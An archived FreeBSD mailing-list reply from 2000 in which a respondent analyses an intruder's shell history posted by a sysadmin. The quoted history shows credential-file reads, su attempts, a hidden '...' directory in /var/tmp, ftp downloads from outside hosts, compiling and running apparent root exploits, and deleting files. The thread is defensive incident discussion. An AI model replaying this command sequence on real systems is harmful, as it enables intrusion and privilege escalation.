Date: Mon, 18 Dec 2000 12:43:26 -0800 From: David <davidd@datasphereweb.com> To: "Gerald T. Freymann" <freymann@eagle.ca> Cc: Questions <questions@FreeBSD.ORG> Subject: Re: Hacker history file - OUCH Message-ID: <20001218124326.A552@datasphereweb.com> In-Reply-To: <NEBBIPHLEDGOAFACJGDDAEBPDHAA.freymann@eagle.ca>; from freymann@eagle.ca on Mon, Dec 18, 2000 at 03:06:32PM -0500 References: <NEBBIPHLEDGOAFACJGDDAEBPDHAA.freymann@eagle.ca>
next in thread | previous in thread | raw e-mail | index | archive | help
On Mon, Dec 18, 2000 at 03:06:32PM -0500, Gerald T. Freymann wrote: > Seems we have an intruder on one of our boxes... the .history file from the > troubled account follows: > > cd bnc > ls > ./bash > who > cd /etc > more passwd > ps -l > ls -l > more pwd.db > more hosts Looks like he's just storing stuff into his telnet buffer for recovery later. > pico adduser.conf.bak > pico group > su user > pico group.bak > pico ftpuser > O > pico ftpusers > su toor > su operator > id > pico spwd.db > su wheel > pico passwd I think this is fairly obvious :) > cd /var/tmp > ls -a > cd ... > ls -a > cd .. > ls -l > ls -al > cd ... Ok, the 'cd ...' is where you need to be looking. I would venture to guess that if you go into /var/tmp you'll see an odd . directory. When you do an ls -al you should only see . and .. A lot of system crackers will hide stuff in these type directories which are easy to overlook. I think once you find this directory you can determine what a lot of the rest of this does. > ftp copper.he.net > chmod u+x xcon > ./xcon > id > rm * > ls > who > cd /var/tmp > ls -a > ls -al > cd ... > ls -a > ftp cih.edu.mx > ls > cc bsd1 bsd-cron.c > cc -o bsd1 bsd-cron.c > ./bsd1 > id > cc -o bsd2 bsd2.c > ./bsd2 > id > ls > ftp cih.edu.mx > ./bsd sh > ./bsd.sh > chmod u+x bsd.sh > ./bsd.sh > /tmp/sh > id > ls > cc -o bsdsmail bsdsmail.c > ./bsdsmail > ls -a > pico hack > ls > pico user.inf > ls > id > rm * > exit The rest of this is just him ftp'ing some source files and building them on your system. What they are...I don't know. -- |> /\ \/ @ davidd@datasphereweb.com DataSphere - Back end web programming, site security, and networking david.daugherty@netmanage.com Software Engineer NetManage - The Bridge to E-Business http://www.wcug.wwu.edu/~doc ICQ: 21106703 "I like the dreams of the future better than the history of the past" -Thomas Jefferson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20001218124326.A552>